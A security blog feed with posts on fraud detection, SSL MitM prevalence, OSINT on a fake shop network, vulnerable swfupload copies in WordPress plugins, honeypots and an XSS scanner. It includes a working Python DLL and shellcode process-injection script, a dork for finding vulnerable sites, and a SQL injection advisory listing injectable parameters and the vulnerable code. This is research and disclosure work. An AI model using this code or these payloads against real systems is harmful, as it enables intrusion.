To respond to this new kind of fraud Minded Security has started to research viable detection techniques and implemented a new solution based on Telemetry Modeling.
This is a short description of the viable detection techniques: Desktop Properties Detection, Detection of Velocity Pings or Session Keepalives, Telemetry Modeling of User Biometrics, Telemetry Modeling of Protocols and IOC Detection.
This is the most basic detection. The point is to spot anomalies in the properties of the browser/desktop being used: for example, older RDP protocols might alter the color depth, and hidden VNC sessions may have unusual desktop resolutions.
Those indicators can be tracked and then correlated to build a detection.
While waiting for the user to disclose his PIN/OTP, the attacker must keep the user's session alive if he wants to use it later to perform a wire transfer. This is what "velocity pings" are for: periodic HTTP requests whose goal is to keep the session alive.
The cadence and content of these requests can be used to build an indicator of compromise and trigger a detection.
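One way to turn cadence into an indicator is to flag sessions whose inter-request intervals are suspiciously regular, since human browsing is burstier than a timer. This is a simplified sketch; the thresholds and timestamps are made up:

```python
from statistics import mean, pstdev

def looks_like_keepalive(timestamps, max_jitter=0.5, max_interval=60):
    """Flag a request train that fires at short, machine-regular
    intervals; humans produce far more jitter than this."""
    if len(timestamps) < 4:
        return False
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return mean(intervals) < max_interval and pstdev(intervals) < max_jitter

# A bot pinging every ~15 seconds vs. a human reading pages.
bot = [0, 15.0, 30.1, 45.0, 60.1]
human = [0, 4.2, 38.0, 39.5, 122.0]
print(looks_like_keepalive(bot), looks_like_keepalive(human))
```

A production detector would also weigh the request content and target URL, but interval regularity alone already separates the two traces above.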
The point of this approach is to track the user's telemetry (keyboard usage, mouse movements, input gestures) to build a model of the user. Once built, the model is used as a yardstick in an anomaly detection context: the output gives an insight into whether the current session is being driven by the usual user.
Unfortunately while this information is indeed useful, the weaknesses are manifold.
First, the infrastructure needed is far from lightweight: it has to store large amounts of data for the user models and run complex machine learning algorithms in near real time to perform the anomaly detection. This means a complex and expensive infrastructure.
Secondly, the detection is fooled in the corner case of a single machine shared by different people; think of a corporate environment [3].
This detection is one of the most advanced and relies on tracking glitches and anomalies in how the user’s telemetry is transmitted by the desktop remote protocol.
For example, if there is a remote desktop in place, the telemetry data is compressed and passed through by the remote desktop protocol itself; if the user is browsing the bank page through a virtual machine, the input is filtered by the VM layer. All these added software layers operate to synchronize the input received with the input reproduced, adding glitches that can be tracked as anomalies.
This allows for a very light engine able to catch, live, the latency generated by user input flowing through filter-driver chains. Typically, VM guest environments and remote control tools install additional layered interfaces to replicate cursor positions, and this creates latency patterns we can detect.
Once these anomalies are collected, they are used to understand in real time whether there is a remote connection in place. We provide this detection approach in our anti-fraud suite AMT - RATDET Module.
A malware infection can alter the profile of the user’s machine/browser and these alterations could be tracked and used as indicators of compromise to flag the user as a potential victim of fraud.
Alternatively, it may be possible to check for the existence of certain files on the user's file system, like suspicious executables, hidden VNC servers and others, that can be used as evidence of infection.
These indicators vary from malware to malware but are very useful for preventing a fraud in the early stages of the killchain, as soon as the user is infected and before the exfiltration is put in place.
In this rat race against financial malware there is no de facto detection to rely on: malware is constantly evolving, and so should our defense techniques.
In our opinion, the recipe for successful anti-fraud monitoring lies in a flexible and modular approach: mixing different detection techniques to build a unified risk model of the users.
[3]: A provider for this kind of solution is BioCatch.
]]>Recently Lenovo hit the news because they were caught installing adware on their laptops, namely Superfish, which, amongst other features, also performs SSL MitM on the infected computer.
Unfortunately, Superfish is not the only one caught nullifying end-to-end SSL encryption. Many other programs and services turn this "feature" into a nightmare: the result is that nowadays SSL man-in-the-middle is not an uncommon scenario at all.
Thanks to Minded Security's AMT Technology we are able to provide some insights, since we monitor this kind of threat, which is quite common in banking malware too: an example is Hesperbot, which deploys an intercepting proxy on localhost to serve fake SSL certificates to its victims.
What we do is analyse our clients' users' security stance to understand whether they accept invalid certificates from external sources.
On any given day we can correlate unique users plagued by SSL MitM with the presence of different adware, not only Superfish:
Those numbers are daily averages collected from a sample of two weeks of traffic out of over 1 year of logs. The following graph shows how a total of ~20% of MitM'd users correlates with an adware infection:
But there's more than just malware when dealing with SSL interception. Many legitimate services underestimate this risk and accept it as a tradeoff for various gains.
That's the case of "cloud accelerated" browsers, where users' requests are cached in the cloud to provide a performance boost. Some versions of Opera Mini, Maxthon or Puffin behave this way; they are not so uncommon and together account for 31.02% of the total positive users we monitored.
On the Puffin Faqs we can read:
“All traffic from Puffin app to Puffin server are encrypted. It is safe to use public non-secure WiFi through Puffin, but not safe at all for most browsers.”
Which highlights that the cloud server is used as a proxy, thus sending requests on behalf of the users.
It's not so clear for Maxthon, instead. After the Superfish fiasco they published a note stating that yes, Maxthon users were positive to the SSL MitM test, but they were nonetheless secure:
“[…] Due to the way we handle javascript requests in our browser, Maxthon’s PC browser unintentionally triggers a false positive on the Superfish test. In most cases running the test on other browsers on your system will not. If you find yourself in a position where Maxthon is said to be insecure and Chrome (on the same machine) is not, do not worry. If you get positives from all browsers, you likely have Superfish.
To repeat: the way Maxthon browsers retrieve javascript can trigger a false positive during a Superfish detection test saying your system is at risk. Even though our browsers remain as secure as the best in the industry, we recognize the severity of this bug and have elevated it to the top of the line – P1 importance.”
According to our tests, Maxthon's Windows client application ignores SSL certificates on remote JavaScript resources and AJAX requests. Fortunately, the annoying behaviour has apparently been fixed in v4.4.4.3000.
The idea of increasing performance by caching or inspecting the content of data in transit is not used exclusively by cloud browsers.
In fact, we discovered some users using legitimate services like VPNs and triggering SSL MitM alerts on our systems. For example:
have a high correlation ratio.
From the SpotFlux website we read:
“Mobile data compression helps you save on bandwidth bills”
The following graph shows the percentage of services against the total of SSL MitM'd users we monitored:
The classic SSL model is meant to protect communications end-to-end, but if the user's connection is initiated or intercepted by the cloud service provider, this purpose falls short: the security of the SSL model depends on how the encryption keys are exchanged.
Lastly, we observed a plethora of private networks (hotels, public hotspots, small companies) with a high correlation ratio, for which we couldn't identify a common cause other than misconfiguration.
To sum it up, SSL MitM is a really common scenario with very different causes and broad consequences. We advise being very wary of the software you use on your devices since, as we've shown, even legitimate services and apps can pose a threat to your security profile.
]]>In the end the item arrived and the ecommerce proved to be somewhat legit, so the FakeCommerce label might be a bit sensationalistic.
Anyhow, the quick investigation I performed was a good OSINT exercise worth sharing.
The website was pietraneraetna.it.
This is the email he received to confirm his purchase:
Da: [email protected] invio:domenica 18 gennaio 2015 13:20:22A:XXXX=
[email protected] [email protected]:You have transferred 91.41 EUR to=
pietraneraetna.it.--------------------------------------------------------=
-----------------------------------------------------------The order detail=
s are as follows:----------------------------------------------------------=
---------------------------------------------------------Order No.: XXXX-mm=
XXXXss-hpdXXXXSeller website: pietraneraetna.itPayment Date&Time: 2015-01-1=
8 20:20Amount: 91.41 EURPayment No.: HPV15011820154XXXXXXDue to the foreign =
exchange rate=2C the amount displayed on your statement might be a little b=
it different from the real price.You can also check your order status and c=
onfirm the merchandise delivery on our bill support webiste ofPlease note "=
BUTTER UILF" will be displayed on your credit card statement instead of the=
website from which you purchased the mentioned product.It's just used for =
sending bill statement by the seller's payment processor as a tool.--------=
---------------------------------------------------------------------------=
--------------------------------Should you need any further assistance=2C p=
lease don't hesitate to contact our Customer Services department at service=
@winwservice.comwith the transaction details listed above or visit our bill=
support webiste of The order on the help site of random codes are 99495512=
62.Tel: +86-0755-83268282Fax: +86-0755-83268282E-mail: service@winwservice.=
com------------------------------------------------------------------------=
-------------------------------------------If you have any question=2C plea=
se don't hesitate to contact us! =
Some interesting pieces:
Please note "BUTTER UILF" will be displayed on your credit card statement instead of the website from which you purchased the mentioned product. It's just used for sending bill statement by the seller's payment processor as a tool.
A quick search on BUTTER UILF revealed nothing. But the email included some contact details:
Tel: +86-0755-83268282
Fax: +86-0755-83268282
E-mail: [email protected]
So +86 is China's country calling code, and 0755 is the Shenzhen prefix.
While the site is advertised as a local Italian shop, it looks like it's Chinese instead.
The copy on the pages has also very likely been machine-translated.
The domain winwservice.com is registered by HICHINA ZHICHENG TECHNOLOGY LTD.
There is no website attached. A quick search reveals some ripoff reports:
Ordered designer bag from an outlet store on line saying it was in Atlanta, Ga
after giving my credit card payment,received email,Order paid successfully.Order transfered to 1465.49CNY to wonderchinagoods.com
then goes on to say,due to foreign exchange rate,amount displayed on my credit card,might be different from real price.
said please note"SZ PL CO.LTD" will be displayed on credit card instead of websit you ordered from and that the method is used for sending bill statement by the sellers payment processor as a tool.
this was not displayed on the initial Web site I ordered from, the site had designers Name @ logo, looked very official, and was close to where I reside.
i have replied several time to cancel this order,with no response.,I was going to try get explanation,but with no response, I now have to go through all the inconvenience of reporting it to my credit card company.
this should be illegal and considered fraud.
Back to pietraneraetna.it. The website looks extremely shady and is very similar to the one described in the ripoff report: it is a single-brand shop where products are heavily discounted, the copy is badly translated and, even worse, it processes credit cards directly.
A whois reveals that the domain is registered by Mr Xiao Xiaoli. On the same IP, 31.222.203.13, there are 13 other sites, many of which closely resemble the current ecommerce's template: single brand, bad copy, heavy discounts, direct credit card processing, you get the picture.
The list:
Most TLDs are European, one is Canadian. This is interesting and raises the suspicion that there could be a network of this kind of ecommerce spanning through Europe. The registrant names yield nothing useful: different common names, lots of false positives.
The IP, instead, reveals an interesting ASN: AS12327 IDEAR4BUSINESS-INTERNATIONAL-LTD idear4business international LTD (registered Mar 30, 2011).
Let's find the associated IP blocks:
whois -h whois.radb.net -- '-i origin AS12327' | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]+" | sort -u
The resulting subnets:
31.222.200.0/21
37.148.216.0/21
37.148.218.0/23
37.148.220.0/22
195.191.102.0/23
A quick manual investigation of the IPs revealed some more similar ecommerce sites. DomainTools' IP Explorer proved extremely useful to quickly find populated D blocks.
The next step was to perform a mass reverse IP lookup on those subnets.
Then I compared the front pages of the already known fake ecommerces to derive a common pattern, on top of which I started scraping the whole domain list with the help of some curl and grep fu. It took a lot of time.
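The classification step of that curl-and-grep pipeline boils down to counting telltale strings on each front page. A toy version of the idea; the markers and threshold below are invented for illustration, not the actual pattern I used:

```python
import re

# Hypothetical markers distilled from the known fake shops' front pages.
MARKERS = [
    re.compile(r"free shipping", re.I),
    re.compile(r"\b\d+% off\b", re.I),
    re.compile(r"credit card", re.I),
]

def looks_fake(front_page_html, threshold=2):
    """Count marker hits; flag the page when enough of them match."""
    hits = sum(1 for marker in MARKERS if marker.search(front_page_html))
    return hits >= threshold

sample = "<h1>Brand Outlet</h1> 70% off, free shipping, we accept credit card"
print(looks_fake(sample))  # True
```

Requiring several independent markers keeps the false-positive rate down, though as noted the real pattern was far from perfect.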
The pattern was far from perfect (and the scraping is incomplete) but gave an astounding list of over 1000 matches. I suspect there might be some more. The list is here for your delight, with some false positives. Here is an excerpt:
Most domains are brand related; some others are obviously totally unrelated and might be recently expired domains mass-purchased to profit from their previous SEO reputation. The whole network deployment scheme looks totally automated and many sites share the same product catalog.
In the end I can't say whether this Chinese ecommerce network, while looking shady, is a total scam, because my friend received his purchase. Anyhow, I still advised him to block the credit card he used.
]]>Also available on WordPress.tv.
Slides: Available on SlideShare
]]>swfupload.swf which is vulnerable to XSS. The original hole was found by Neal Poole.
Together with Ryan we investigated this issue a little, and after performing a quick dork on Google he noticed that a few WordPress plugins were bundling the very same vulnerable applet.
To spot all the affected plugins I wrote a quick crawler and ran it against the public WordPress SVN plugin repository and, without much surprise, we discovered a total of 40 plugins which included the vulnerable swf:
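The crawl boiled down to fetching each plugin's swfupload.swf and comparing its MD5 to the known-vulnerable hash shown in the list below. A minimal sketch of the matching step, with the download stubbed out (not the original script):

```python
import hashlib

# MD5 of the vulnerable swfupload.swf bundled by the affected plugins.
VULNERABLE_MD5 = "3a1c6cc728dddc258091a601f28a9c12"

def is_vulnerable(swf_bytes: bytes) -> bool:
    """Compare the file's MD5 against the known bad swfupload.swf hash."""
    return hashlib.md5(swf_bytes).hexdigest() == VULNERABLE_MD5

# In the real crawl, swf_bytes would come from fetching each
# plugins.svn.wordpress.org/<plugin>/trunk/.../swfupload.swf URL.
print(is_vulnerable(b"some other flash file"))  # False
```

Hash matching is enough here because every affected plugin shipped a byte-identical copy of the swf, as the identical checksums below show.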
http://plugins.svn.wordpress.org/wysija-newsletters/trunk/js/jquery/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-yasslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-vertical-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-superb-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-royal-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-powerplaygallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-matrix-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-levoslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-image-news-slider/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-homepage-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-flipslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-extended/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-ecommerce-cvs-importer/trunk/upload/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-dreamworkgallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-carouselslideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-bliss-gallery/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-3dflick-slideshow/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/wp-3dbanner-rotator/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/ultimate-tinymce/trunk/addons/images/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/sprapid/trunk/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/spotlightyour/trunk/library/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/smart-slide-show/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/slide-show-pro/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/power-zoomer/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/pica-photo-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/pdw-file-browser/trunk/pdw_file_browser/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/nextgen-gallery/trunk/admin/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/mac-dock-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/mac-dock-photogallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fresh-page/trunk/thirdparty/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-ui-options/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-uploader/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-pager/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/fluid-accessible-rich-inline-edit/trunk/infusion/lib/swfupload/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/flash-album-gallery/trunk/admin/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/dm-albums/trunk/flash/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/comment-extra-field/trunk/scripts/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/blaze-slide-show-for-wordpress/trunk/js/swfupload/js/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/apptha-slider-gallery/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
http://plugins.svn.wordpress.org/apptha-banner/trunk/js/swfupload/swfupload.swf - 3a1c6cc728dddc258091a601f28a9c12
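The test itself is nothing more than an MD5 comparison against the known-bad build — a minimal sketch of the check (the hash comes from the list above; the fetching logic is omitted):

```python
import hashlib

# MD5 of the vulnerable swfupload.swf build, taken from the scan results above
VULN_MD5 = '3a1c6cc728dddc258091a601f28a9c12'

def is_vulnerable_swf(data):
    """Return True if the file bytes match the known-bad swfupload.swf."""
    return hashlib.md5(data).hexdigest() == VULN_MD5
```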
The affected plugins were promptly disclosed to the Wordpress development team and are now included in WPScan’s database.
On a side note, we scanned the themes in the public directory as well but didn't find anything. On the other hand, after a little google-fu we found out that some commercial themes bundle swfupload.
We didn’t investigate further on those, but here is the dork:
inurl:wp-content/themes inurl:swfupload.swf
Let us know if you find something!
Finally here is the crawler I wrote. It’s based on scrapy (which is awesome) and it’s simple enough to be customized without much effort:
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.item import Item, Field

class SWFfound(Item):
    url = Field()

class Yummy(CrawlSpider):
    name = 'swfupload_test'
    allowed_domains = ['themes.svn.wordpress.org']
    start_urls = ['http://themes.svn.wordpress.org/']
    rules = (
        Rule(SgmlLinkExtractor(deny=('.*assets/', '.*branches/', '.*tags/'))),
        Rule(SgmlLinkExtractor(allow=(r'swfupload\.swf',), deny_extensions=('php', 'jpg', 'jpeg', 'gif', 'png', 'htm', 'html')), callback='parse_item'),
    )

    def parse_item(self, response):
        self.log('Found:\t%s' % response.url)
        item = SWFfound()
        item['url'] = str(response.url)
        return item

SPIDER = Yummy()
Ryan found a vulnerable copy of swfupload.swf on the Xen and Apple websites, he did a responsible disclosure and they fixed it. He got rewarded with a warm pat on the shoulder and a thank you.
Lesson learned: never send out the bug details in the first email; ask instead if they have a bug bounty program :)
]]>As specified by the RFCs, browsers are not required to send the fragment to the server, since it should be used only for client-side purposes. This is a problem when a web app honeypot is involved, because we want to log everything that could expose a potential attack.
Since we can't do much server-side, it's still possible to catch fragments through a little javascript trickery. For example, on page load we can silently send the current window.location via an ajax call (and completely delegate the hassle of analyzing it to our honeypot, server-side).
And since DOM XSS are heavily conditioned by the client environment (browser type, version, etc.), we should send this information alongside the window.location too for a better analysis.
A quick prototype using jQuery:
// Build the request
var request = { 'url': window.location.toString() };
request = $.extend(request, $.browser);

// Send via ajax
$.ajax({
    type: 'POST',
    url: 'http://honeypot/catch.php',
    data: request,
    complete: function(jqXHR, textStatus) {
        console.log('URL Sent: ' + textStatus);
    }
});
I’ve taken advantage of jQuery.browser to collect browser information. I put together a simplified proof of concept.
The implementation of catch.php is a matter of choice.
Personally I’d rather not send responses back to requests (just throw 404s) to reduce the risk that a brute force fuzz might uncover it: it’s an honeypot after all! It’s like a ninja web app!
The downside of this approach is that without a solid error-checking mechanism our ajax communications are downgraded to best-effort attempts.
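For illustration only — catch.php is deliberately left open above — here is how such a log-everything-answer-404 endpoint might look, translated to Python as a bare WSGI app (all names here are mine, not the honeypot's):

```python
# Hypothetical Python rendition of catch.php: record everything, always
# answer 404 so a brute-force fuzz sees nothing interesting.

CAUGHT = []  # stand-in for whatever storage the real honeypot would use

def catch(environ, start_response):
    # Minimal WSGI app: read the POSTed fields, store them, play dead
    length = int(environ.get('CONTENT_LENGTH') or 0)
    body = environ['wsgi.input'].read(length).decode('utf-8', 'replace')
    CAUGHT.append({'remote': environ.get('REMOTE_ADDR'), 'data': body})
    # Always a bare 404, never a real response body
    start_response('404 Not Found', [('Content-Type', 'text/plain')])
    return [b'']
```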
Anyway I am looking to write a plugin for wordpot to handle this so I might eventually change my mind.
]]>For example some time ago we were debunking a fake advisory with Ryan and we found a bunch of xss in the very same plugin just by running DevBug (which was not even optimized for Wordpress code). There is a gold mine of easy bugs down there.
The hassle is that properly disclosing a vuln takes a lot of time: you have to find it, test it, warn the author, warn Automattic, and publish an advisory. If you hit an unresponsive author it may take up to a month, and meanwhile a horde of new plugins gets published. We can’t keep up, and most of the time it’s not worth it.
And what if down the mine there is a true gem nobody knows about yet? What if it’s first found by someone with malicious intent? That’s the problem: a vuln exploited before the advisory. And WPScan relies on advisories as its main source of data. You do the math.
Having fresh data is crucial: from a defensive standpoint an average Wordpress user should care far more about actively exploited vulns than about random bugs in his installed plugins. In the end, if a vulnerability is not exploited it’s not a real menace (just a potential one). For example, I personally like how recurrently a vulnerable timthumb file is found inside a plugin and a wave of wild exploitation arises.
To catch those attacks the approach is standard: honeypots.
This should also be how commercial appsec vendors like SpiderLabs and Sucuri are detecting attacks. SpiderLabs seems to have a web app honeypot (general purpose? Wordpress specific?) while at Sucuri they might just monitor their clients’ Wordpress installations, since they seem to have a large wordpress-centric user base.
I am just speculating, since nobody is kind enough to share their secrets. The best tool available so far is Glastopf, which is general purpose and thus quite useless in our case.
So to cope with the loss of proper tools I’ve built a Wordpress honeypot from scratch in the hope to catch some exploitation and provide the WPScan project with fresh data. It’s called wordpot and is public domain.
If you were thinking about contributing to WPScan in one way or another, starting now you can also help by installing wordpot and letting us know how it goes.
]]>Enjoy:
import sys
from ctypes import *

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x00000040
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
SYNCHRONIZE = 0x00100000
PROCESS_ALL_ACCESS = ( DELETE |
                       READ_CONTROL |
                       WRITE_DAC |
                       WRITE_OWNER |
                       SYNCHRONIZE |
                       0xFFF  # If < WinXP/WinServer2003 - 0xFFFF otherwise
                     )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

KERNEL32 = windll.kernel32

def dllinject(dll_path, pid):
    """ Inject a DLL into target process.

    :param dll_path: path to dll
    :param pid: target process id
    """
    dll_len = len(dll_path)
    h_process = KERNEL32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if not h_process:
        # No handle to PID
        return False
    # Allocate space and write DLL path into it
    dll_address = KERNEL32.VirtualAllocEx(
        h_process,
        0,
        dll_len,
        VIRTUAL_MEM,
        PAGE_READWRITE)
    w = c_int(0)
    KERNEL32.WriteProcessMemory(
        h_process,
        dll_address,
        dll_path,
        dll_len,
        byref(w))
    # Where is LoadLibraryA?
    h_kernel32 = KERNEL32.GetModuleHandleA('kernel32.dll')
    h_loadlib = KERNEL32.GetProcAddress(h_kernel32, 'LoadLibraryA')
    # Create thread
    t_id = c_ulong(0)
    if not KERNEL32.CreateRemoteThread(
            h_process,
            None,
            0,
            h_loadlib,
            dll_address,
            0,
            byref(t_id)):
        # Cannot start a thread
        return False
    print t_id
    return True

def codeinject(shellcode, pid):
    """ Inject code into target process.

    :param shellcode: shellcode to inject
    :param pid: target process id
    """
    shellcode_len = len(shellcode)
    h_process = KERNEL32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if not h_process:
        # No handle to PID
        print 'No handle to PID'
        return False
    shellcode_address = KERNEL32.VirtualAllocEx(
        h_process,
        0,
        shellcode_len,
        VIRTUAL_MEM,
        PAGE_EXECUTE_READWRITE)
    w = c_int(0)
    KERNEL32.WriteProcessMemory(
        h_process,
        shellcode_address,
        shellcode,
        shellcode_len,
        byref(w))
    t_id = c_ulong(0)
    if not KERNEL32.CreateRemoteThread(
            h_process,
            None,
            0,
            shellcode_address,
            None,
            0,
            byref(t_id)):
        # Cannot start thread
        return False
    return True
Injection is performed through CreateRemoteThread, which is not supported on Windows Vista, 7 and 8 (you ought to use NtCreateThreadEx instead).
First and foremost it’s important to highlight that the goal of this tool is to test an entire web application automatically with minimum human intervention (maybe xssnuker would be a better name!).
With this in mind, the biggest change has been made to the injection engine. In earlier versions user intervention was needed to choose which xss payload (Y) to inject and what artifacts (Z) to check for in responses:
$ python xsssniper.py --url 'X' --payload 'Y' --check 'Z'
This was pretty much like testing injections from the browser. Awful.
After a little research and testing I redesigned the engine to automatically inject a taint and check the response for the taint’s artifacts, in order to deduce whether an injection was correctly performed and where.
The taint is something like this:
seed:seed seed=-->seed\"seed>seed'seed>seed+seed<seed>
Where the seed is a random alphanumeric string.
After the taint is injected, the response is parsed by a finite state machine that looks for the seed and keeps track of its logical position in the document (inside a tag attribute, inside an href, inside double quotes, inside single quotes, etc.).
If a seed is discovered in a correct position the injection is verified and reported.
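A toy illustration of this seed-position idea — a flat scan classifying each reflection by the character that survived right before it, nowhere near the real finite state machine:

```python
import re
import random
import string

def make_seed(n=8):
    # Random alphanumeric marker, unlikely to occur naturally in a page
    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))

def classify_contexts(html, seed):
    """Report, for each reflected seed, which break-out character
    survived immediately before it (a crude stand-in for the FSM)."""
    contexts = []
    for m in re.finditer(re.escape(seed), html):
        prev = html[m.start() - 1] if m.start() else ''
        if prev == '"':
            contexts.append('double-quoted attribute')
        elif prev == "'":
            contexts.append('single-quoted attribute')
        elif prev == '>':
            contexts.append('tag body')
        else:
            contexts.append('unknown')
    return contexts
```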
This little change had a great impact on overall performances and has opened the gate to great mass scan functionalities.
In fact, before triggering the injection engine a set of crawlers is run with the purpose of collecting new targets to test. The crawlers are:
--crawl) to retrieve every local URL.
--forms) to retrieve every form on the page or, if used in conjunction with the url crawler, on the entire website.
--dom) used to collect javascripts, embedded and linked, to test against dom xss.
I am trying my best to detect dom xss too, but unfortunately it looks like automatically testing for this vulnerability is a really difficult problem.
The solution adopted, far from being definitive, is to scan every javascript for common sources and sinks as suggested here.
This is nothing more than running a regexp to highlight possible injection points, but no automatic verification is performed so a manual inspection from the user is still needed.
This is because I still haven’t found a satisfying way to statically analyze the javascript: suggestions on this point are more than welcome!
Lastly we have a few options of common utility:
--post and --data to send post requests
--threads to manage the number of threads used
--http-proxy and --tor to scan behind proxies
--user-agent to specify a user agent
--random-agent to randomize the user agent
--cookie to use a cookie
For the next versions I have a little todo list with some features I’d like to implement, but on top of it is the possibility to test injections with encoded payloads/taints. I think this is vital because right now discovered injections are still pretty basic.
Oh, and HTTP response splitting! I want that too.
And, last but not least, I’d really like to improve the output format: I tried different styles but it still looks clumsy to me.
That’s all for now. As usual all the code and docs are available here on my bitbucket.
If you have any suggestions, feature request, urge to contribute or just a bug to report… I want to hear from you!
]]># Exploit Title: WordPress Mingle Forum plugin <= 1.0.32.1 Multiple Vulnerabilities
# Date: 2012/01/18
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.32.1.zip
# Version: 1.0.32.1
You need an authenticated session to exploit the following vulnerabilities.
POST: admin.php?page=mfgroups&mingleforum_Action=usergroups
delete_usergroups: Delete
dele_usrgrp%5B%5D: 1 [SQLI]
Vulnerable code:
function delete_usergroups(){
    if (isset($_POST['delete_usergroups'])){
        global $wpdb, $table_prefix;
        $delete_usrgrp = $_POST['delete_usrgrp'];
        $groups = "";
        $count = count($delete_usrgrp);
        for($i = 0; $i < $count; $i++){
            $wpdb->query("DELETE FROM ".$table_prefix."forum_usergroups WHERE id = {$delete_usrgrp[$i]}");
            $wpdb->query("DELETE FROM ".$table_prefix."forum_usergroup2user WHERE `group` = {$delete_usrgrp[$i]}");
        }
        return true;
    }
    return false;
}
POST: admin.php?page=mfgroups&mingleforum_action=usergroups&do=add_user_togroup
togroupusers: users
usergroup: bar [SQLI]
add_user_togroup: Add+users
Vulnerable code:
$group = $_POST['usergroup'];
---
$msg = __("User", "mingleforum")." \"$user\" ".__("added successfully", "mingleforum")."<br />";
$sql = "INSERT INTO ".$table_prefix."forum_usergroup2user (user_id, `group`) VALUES('$id', '$group')";
$wpdb->query($sql);
++$added;
admin.php?page=mingle-forum
Some options are not escaped so you can inject a payload in the admin interface. Notice that every option is passed through update_option() before being saved in the db, so no sqli here.
Vulnerable code:
'forum_posts_per_page' => $wpdb->escape($_POST['forum_posts_per_page']),
'forum_threads_per_page' => $wpdb->escape($_POST['forum_threads_per_page']),
'forum_require_registration' => $_POST['forum_require_registration'],
'forum_show_login_form' => $_POST['forum_show_login_form'],
'forum_date_format' => $wpdb->escape($_POST['forum_date_format']),
'forum_use_gravatar' => $_POST['forum_use_gravatar'],
'forum_show_bio' => $_POST['forum_show_bio'],
'forum_skin' => $op['forum_skin'],
'forum_use_rss' => $_POST['forum_use_rss'],
